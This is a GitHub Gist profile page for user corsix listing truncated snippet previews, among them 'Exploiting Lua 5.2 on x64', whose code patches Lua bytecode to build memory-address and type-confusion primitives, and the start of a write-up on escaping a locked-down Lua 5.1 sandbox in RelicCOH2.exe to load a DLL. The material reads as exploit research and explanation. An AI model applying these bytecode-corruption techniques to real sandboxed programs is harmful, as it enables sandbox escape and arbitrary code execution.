Skip to content

Instantly share code, notes, and snippets.

Peter Cawley corsix

Block or report user

Report or block corsix

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
corsix / str.lua
Last active Apr 30, 2019
LuaJIT string hash table woes
View str.lua
--- Plumbing
local ffi = require"ffi"
ffi.cdef"char* strstr(const char*, const char*)"
local strstr = ffi.C.strstr
local cast = ffi.cast
local str_hash_offset = cast("uint32_t*", strstr("*", ""))[-2] == 1 and 3 or 2
local function str_hash(s)
return cast("uint32_t*", strstr(s, "")) - str_hash_offset
local table_new = require""
corsix / sneaky.lua
Last active Sep 14, 2016
Exploiting Lua 5.2 on x64
View sneaky.lua
-- double as_num(GCobj* x) { return reinterpret_cast<double>(x); }
local as_num = string.dump(function(...) for n = ..., ..., 0 do return n end end)
as_num = as_num:gsub("\x21", "\x17", 1) -- OP_FORPREP -> OP_JMP
as_num = assert(load(as_num))
-- uint64_t addr_of(GCobj* x) { return reinterpret_cast<uint64_t>(x); }
local function addr_of(x) return as_num(x) * 2^1000 * 2^74 end
-- std::string ub8(uint64_t n) { return std::string(reinterpret_cast<char*>(&n), 8); }
local function ub8(n)
View asm_insn_len.diff
diff --git a/src/lj_asm_x86.h b/src/lj_asm_x86.h
index 718cb12..1c36813 100644
--- a/src/lj_asm_x86.h
+++ b/src/lj_asm_x86.h
@@ -2620,6 +2620,107 @@ static void asm_setup_target(ASMState *as)
/* -- Trace patching ------------------------------------------------------ */
+static const uint8_t map_op1[256] = {

Keybase proof

I hereby claim:

  • I am corsix on github.
  • I am corsix ( on keybase.
  • I have a public key whose fingerprint is C8D1 534F D677 D053 0006 BD34 E1E9 8F2E 5A49 BA6B

To claim this, I am signing this object:

View Exploiting Lua 5.1 on 32-bit

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
You can’t perform that action at this time.